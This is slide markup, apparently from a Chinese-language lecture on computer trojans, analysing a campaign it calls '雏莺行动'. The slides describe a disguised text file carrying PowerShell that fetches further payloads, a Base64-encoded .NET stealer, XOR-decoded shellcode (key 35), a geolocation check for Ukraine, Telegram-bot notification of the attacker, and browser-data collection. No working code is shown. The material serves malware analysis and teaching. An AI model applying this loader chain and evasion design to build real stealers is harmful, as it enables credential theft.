          <p:cNvPr id="6" name="图片 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1AECF70D-FA39-4BD1-8F09-92D607CF70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905" y="792515"/>
            <a:ext cx="6676190" cy="5638095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="91131416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9A5F3B0-5F62-40C9-869B-D753B1E0CB6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="553882" y="1371600"/>
            <a:ext cx="8260334" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>excel.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>的内容中包含了很多俄罗斯著名运动员的信息作为混淆，并在末尾处夹杂了一段</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>PowerShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>代码，其功能为下载“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>pow.ps1”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>、“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>pork.txt”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>等后续载荷并执行。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D799AF6-53BA-4D82-9B0A-7E920C2719EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0"/>
              <a:t>雏莺行动</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{011D2948-6182-435D-908F-488A8A4602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784" y="3858605"/>
            <a:ext cx="8814216" cy="2182483"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="203202871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9A5F3B0-5F62-40C9-869B-D753B1E0CB6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="553882" y="1251679"/>
            <a:ext cx="8260334" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>pow.ps1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>脚本中包含一个名为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>load_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>的变量，该变量使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>Base64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>进行编码，解码后是一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>.NET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>可执行程序，经过分析为开源窃密程序修改而成</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D799AF6-53BA-4D82-9B0A-7E920C2719EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0"/>
              <a:t>雏莺行动</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01D3FDB9-EE9E-48D8-B120-D2C6FD218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3905" y="2856080"/>
            <a:ext cx="5876190" cy="3514286"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="194543181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9A5F3B0-5F62-40C9-869B-D753B1E0CB6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="553882" y="1154097"/>
            <a:ext cx="8260334" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>pork.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>中功能主要为下载</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>pay.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>脚本，并使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>FromBase64String</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>解码该脚本。解码后的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>pay.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>，其中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>var_code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>变量依旧是一段</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>Base64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>编码的字符串，并且该变量是经过异或加密的，解密密钥为十进制的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>35</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D799AF6-53BA-4D82-9B0A-7E920C2719EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0"/>
              <a:t>雏莺行动</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72152B03-3694-44A8-87D7-CE278EEDE3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49" y="3694784"/>
            <a:ext cx="9144000" cy="3178206"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1493222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讨论：一句话木马是不是无文件木马？</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>计算机木马</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="387203692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9A5F3B0-5F62-40C9-869B-D753B1E0CB6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="441832" y="1483880"/>
            <a:ext cx="8342403" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>解码异或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>var_code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>变量，最后是一段</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>ShellCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>代码，可以看到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>LoadLibraryA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>VirtualAlloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>等函数</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D799AF6-53BA-4D82-9B0A-7E920C2719EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0"/>
              <a:t>雏莺行动</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3029582-A1A2-4656-8BF1-968A72BC0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938" y="2780835"/>
            <a:ext cx="6752381" cy="3200000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="63801949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9A5F3B0-5F62-40C9-869B-D753B1E0CB6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="801597" y="1371600"/>
            <a:ext cx="8342403" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>反分析方法</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D799AF6-53BA-4D82-9B0A-7E920C2719EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0"/>
              <a:t>雏莺行动</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F95FDC23-2EC6-42D4-AFFE-BECF2B15B33C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1296961" y="1934512"/>
            <a:ext cx="6819900" cy="4495800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="224801833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9A5F3B0-5F62-40C9-869B-D753B1E0CB6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="601572" y="1371600"/>
            <a:ext cx="8342403" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>受害者身份校验部分会通过访问</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>http://ip-api.com/xml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>获取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>地址信息，检测受害者所在国家是否为乌克兰</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D799AF6-53BA-4D82-9B0A-7E920C2719EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0"/>
              <a:t>雏莺行动</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC6EC69E-A373-4E23-B912-2F046F9A4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000" y="2775323"/>
            <a:ext cx="7600000" cy="2980952"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8576ED1B-5A3E-473F-B26C-F8146F995D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3428" y="1889608"/>
            <a:ext cx="6257143" cy="4752381"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="802843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9A5F3B0-5F62-40C9-869B-D753B1E0CB6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="601572" y="1371600"/>
            <a:ext cx="8342403" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>如果样本通过反分析测试，首先根据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>PowerShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>下发的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>参数发送</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Telegram bot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>消息，告知攻击者已经启动</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D799AF6-53BA-4D82-9B0A-7E920C2719EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0"/>
              <a:t>雏莺行动</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D14E5709-1CB8-4B06-9FA3-C56538764D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428" y="2765799"/>
            <a:ext cx="8257143" cy="2990476"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="172650186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9A5F3B0-5F62-40C9-869B-D753B1E0CB6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="601572" y="1371600"/>
            <a:ext cx="8342403" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>搜集浏览器信息</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D799AF6-53BA-4D82-9B0A-7E920C2719EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0"/>
              <a:t>雏莺行动</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6033E549-265E-4EE3-A8BB-9F6F57A7E95A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="892929" y="2132584"/>
            <a:ext cx="6848475" cy="3971925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39119423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9A5F3B0-5F62-40C9-869B-D753B1E0CB6B}"/>
              </a:ext>
